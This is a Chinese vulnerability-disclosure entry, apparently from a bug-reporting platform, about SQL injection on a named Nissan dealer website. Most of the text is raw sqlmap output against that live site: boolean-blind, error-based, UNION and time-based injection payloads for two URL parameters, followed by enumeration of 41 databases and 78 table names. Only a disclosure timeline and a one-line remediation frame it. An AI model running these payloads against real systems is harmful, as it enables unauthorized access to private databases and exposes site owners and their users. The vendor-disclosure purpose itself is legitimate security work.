2015-11-20: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
sqlmap.py -u "http://hljjmsyt.zznissan.com.cn/map.php?jxs='"
sqlmap resumed the following injection point(s) from stored session:---Parameter: jxs (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: jxs=-5068' OR 6417=6417# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: jxs=-6361' OR 1 GROUP BY CONCAT(0x716b706271,(SELECT (CASE WHEN (4978=4978) THEN 1 ELSE 0 END)),0x717a717071,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: UNION query Title: MySQL UNION query (random number) - 17 columns Payload: jxs=-3887' UNION ALL SELECT 9874,9874,9874,9874,9874,CONCAT(0x716b706271,0x716f6d43435956614755,0x717a717071),9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874#---web application technology: Apacheback-end DBMS: MySQL 5current database: 'zznissan'sqlmap resumed the following injection point(s) from stored session:---Parameter: jxs (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: jxs=-5068' OR 6417=6417# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: jxs=-6361' OR 1 GROUP BY CONCAT(0x716b706271,(SELECT (CASE WHEN (4978=4978) THEN 1 ELSE 0 END)),0x717a717071,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: UNION query Title: MySQL UNION query (random number) - 17 columns Payload: jxs=-3887' UNION ALL SELECT 9874,9874,9874,9874,9874,CONCAT(0x716b706271,0x716f6d43435956614755,0x717a717071),9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874#---web application technology: Apacheback-end DBMS: MySQL 5current user: 'zznissan@localhost'sqlmap resumed the following injection point(s) from stored session:---Parameter: jxs (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: jxs=-5068' OR 6417=6417# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: jxs=-6361' OR 1 GROUP BY CONCAT(0x716b706271,(SELECT (CASE WHEN (4978=4978) THEN 1 ELSE 0 END)),0x717a717071,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: UNION query Title: MySQL UNION query (random number) - 17 columns Payload: jxs=-3887' UNION ALL SELECT 9874,9874,9874,9874,9874,CONCAT(0x716b706271,0x716f6d43435956614755,0x717a717071),9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874#---web application technology: Apacheback-end DBMS: MySQL 5available databases [41]:[*] club_15[*] ebuy[*] ebuy1217[*] events[*] events_2014cgr[*] events_2014five[*] events_pickupStory[*] ezznissan[*] information_schema[*] innodb[*] jinzhiwen[*] maintain[*] mysql[*] nissan[*] nissan_2015cgr[*] nissan_jxs[*] nissan_patrol[*] nissanmedia[*] nissantest[*] paladin[*] paladinclub[*] paladinclubtemp[*] palaqi[*] performance_schema[*] specialcar[*] test[*] topic[*] tower_15[*] wqw_five[*] wqw_mx6gc[*] wqw_succk[*] xuhui[*] yaguan[*] zznissan[*] zznissan_eng[*] zznissan_jnds[*] zznissan_lms2015[*] zznissan_mx6sj2015[*] zznissan_mx6tg2015[*] zznissan_pro[*] zznissanbaksqlmap identified the following injection point(s) with a total of 1800 HTTP(s) requests:---Parameter: #1* (URI) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: http://hljjmsyt.zznissan.com.cn:80/ajax_series.php?series=-1607 OR 1 GROUP BY CONCAT(0x716b6b6a71,(SELECT (CASE WHEN (6251=6251) THEN 1 ELSE 0 END)),0x716a6b6a71,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: http://hljjmsyt.zznissan.com.cn:80/ajax_series.php?series=(SELECT (CASE WHEN (7809=7809) THEN SLEEP(5) ELSE 7809*(SELECT 7809 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Type: UNION query Title: MySQL UNION query (random number) - 4 columns Payload: http://hljjmsyt.zznissan.com.cn:80/ajax_series.php?series=-1336 UNION ALL SELECT 8846,8846,CONCAT(0x716b6b6a71,0x4c446b767a6a6149744c,0x716a6b6a71),8846#---web application technology: Apacheback-end DBMS: MySQL 5.0.12sqlmap resumed the following injection point(s) from stored session:---Parameter: jxs (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: jxs=-5068' OR 6417=6417# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: jxs=-6361' OR 1 GROUP BY CONCAT(0x716b706271,(SELECT (CASE WHEN (4978=4978) THEN 1 ELSE 0 END)),0x717a717071,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: UNION query Title: MySQL UNION query (random number) - 17 columns Payload: jxs=-3887' UNION ALL SELECT 9874,9874,9874,9874,9874,CONCAT(0x716b706271,0x716f6d43435956614755,0x717a717071),9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874#---web application technology: Apacheback-end DBMS: MySQL 5Database: zznissan[78 tables]+-------------------+| Recruitment || user || act_article || act_category || article || article1029 || brandpicture || car_adimg || car_brand || car_carimg || car_config || car_detail || car_drive || car_drivehouse || car_getinfo || car_leixing || car_models || car_modelsinfo || car_norms || car_parameter || car_seat || car_series || car_seriesinfo || car_spec || car_speed || car_standard || car_structure || car_user || car_userfun || car_usergroup || car_view || category || department || displacement || downcategory || download || dqcategory || ecatalog || energy_config || energy_detail || energy_images || energy_memory || energy_notice || energy_parameter || energy_picture || energy_series || energy_seriesinfo || energy_video || energy_view || feedback || get_active || imagefile || imgcategory || jxs_getinfo || login_record || memory || mobilepicture || mx6_dealer || mx6_testdrive || mx6_user || picture || price || purecategory || puregoods || rencai || service || service_bak || sessions || survey || telents || topic || userfun || usergroup || view_Carprice || view_models || view_models_test || view_parameter || zhaopin |+-------------------+
过滤相关参数
危害等级:中
漏洞Rank:10
确认时间:2015-11-20 11:17
漏洞已收到,谢谢
暂无